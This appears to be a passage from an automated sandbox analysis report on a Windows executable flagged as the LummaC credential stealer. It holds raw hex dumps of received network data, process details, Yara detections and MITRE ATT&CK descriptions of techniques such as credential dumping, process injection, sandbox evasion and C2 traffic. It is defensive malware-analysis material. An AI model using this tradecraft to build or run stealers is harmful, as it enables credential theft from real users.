2024-12-24 07:54:13 UTC	16384	IN	Data Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72 Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
2024-12-24 07:54:13 UTC	1024	IN	Data Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y1rh4euZ07z~k\SAZ(\a,p?
2024-12-24 07:54:13 UTC	1749	IN	Data Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3 Data Ascii: /od}z:@@eCY\| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg\|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i\|g`
2024-12-24 07:54:13 UTC	9000	IN	Data Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{\|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
2024-12-24 07:54:13 UTC	16384	IN	Data Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0 Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
2024-12-24 07:54:13 UTC	1024	IN	Data Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9 Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF\|\mNUK>#"v*?uNy;WnGHh+L$;=O

Target ID:	2
Start time:	02:53:43
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\2oM46LNCOo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2oM46LNCOo.exe"
Imagebase:	0x7d0000
File size:	2'965'504 bytes
MD5 hash:	3A5F8E977A1A8B210F718F433B8488C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:33:21
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 2012
Imagebase:	0x900000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2oM46LNCOo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2oM46LNCOo.exe_a0d3a3bcbb4533416ba9efa1708b863091765035_fd41d432_5db8c4fd-1f17-4fcc-9a5e-a2f8a7545430\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER27A8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER28E1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2911.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
2oM46LNCOo.exe